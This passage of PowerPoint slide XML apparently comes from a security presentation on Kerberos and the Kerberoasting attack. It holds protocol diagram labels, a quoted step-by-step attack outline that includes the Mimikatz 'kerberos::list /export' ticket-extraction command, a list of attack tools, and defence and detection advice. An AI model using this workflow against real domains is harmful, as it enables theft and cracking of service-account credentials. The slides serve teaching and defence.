        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3226530" y="1227401"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56738D1F-B76C-4536-B27B-7C943090F787}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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BDC64F-C78C-4EC8-92F4-0CF83CDD26A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4050062-9873-4FB6-9F2B-AAC6AD8B777E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3377888" y="1639660"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3196913" y="1306285"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B00F27-22F7-4069-9880-E02010ABAB1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3196913" y="1306285"/>
              <a:ext cx="5190242" cy="1599172"/>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D762194-1087-4543-A897-7D7E6180AB20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4344755" y="1717200"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (receive TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B47BF69-9B1F-44D1-A5DC-74CFCDDD8520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3501511" y="1961012"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3320536" y="1627637"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Straight Arrow Connector 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1E303F-1C33-44AF-B398-A1E42D76C4D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3320536" y="1627637"/>
              <a:ext cx="5271247" cy="1682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A76F2DF-CBB7-4F2C-8024-54C0BC93FD9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="3890252" y="1966409"/>
              <a:ext cx="4642500" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REQ (present TGT, request TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C248EB-F772-48F9-A5EF-1D535A53F2F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3652869" y="2373271"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3471894" y="2039896"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Straight Arrow Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17EE7E12-93E7-42DF-A80D-E4F326DBA9CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3471894" y="2039896"/>
              <a:ext cx="5190242" cy="1599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C32F8D4-3E06-46E3-A23A-59F7D85C6EAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4611779" y="2400062"/>
              <a:ext cx="3074839" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REP (TGS response)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB987B3-807E-414B-8FFD-4187C36D1A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D61540-DC03-44A1-8741-932FC8C5B903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2897659" y="585706"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="51" name="Straight Arrow Connector 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8D8511-4A08-42CA-B5A4-222AA8E1FA10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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21C91D3-A3E5-4035-91FE-4988FBDEE9E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBBC2D70-F582-438D-9CD3-0F3DA7309D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3031958" y="1018435"/>
            <a:ext cx="5221705" cy="1616481"/>
            <a:chOff x="3031958" y="1018435"/>
            <a:chExt cx="5221705" cy="1616481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="54" name="Straight Arrow Connector 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFC4EA1-6F7F-416E-93DC-65774BB1599A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3031958" y="1018435"/>
              <a:ext cx="5221705" cy="1616481"/>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8FF6679-51CA-4346-BC51-434245CCB870}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4202687" y="1360887"/>
              <a:ext cx="3224108" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>KRB_ERR (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Preauth</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> required)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3506675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82BC-948F-482A-9EFE-48AFEFBB9AE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerbroasting</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC7B093-5B2E-430D-BE11-2FEC4B08DF7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Old School:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Enumerate the domain accounts with SPNs set- either with Tim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>GetUserSPNS.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> script, Sean’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Find-PSServiceAccounts.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> script, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>PowerView’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>NetUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> -SPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>“.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Request TGSs for these specific SPNs with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>builtin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Windows tool setspn.exe or the .NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>System.IdentityModel.Tokens.KerberosRequestorSecurityToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> class in PowerShell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Extract these tickets from memory by invoking the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>::list /export</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> command , with the optional base64 export format set first. The tickets were then downloaded, or the base64-encoded versions pulled down to the attacker’s machine and decoded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Begin offline password cracking with Tim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>tgsrepcrack.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, or extract a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>crackable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> hash format from the raw ticket with John the Ripper’s  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>kirbi2john.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2011389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CDEC-D5BD-4963-B210-7628322642CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerbroasting</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD8B56D4-D75C-4B7E-BB6B-8533EB70032C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Impacket’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> GetUserSPNs.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auxiliary/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>get_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Metasploit wrapper around GetUserSPNs.py)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyKerbroast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (kerbroastv2.py)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PowerSploit’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoast</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3111711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DA07-8F33-4BE1-8869-C3F3331534CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerbroasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F3C18A0-A38B-434C-9744-234AC0CCB160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service account passwords &gt; 25 characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Managed Service Accounts / Group Managed Service Accounts (May require Functional Level Upgrade)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Sean Metcalf (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>@PyroTek3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://adsecurity.org/?p=3458</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>PN Honeypot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>lag RC4-HMAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3698011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5CF2-3868-4A39-B8FD-A80D624A445A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
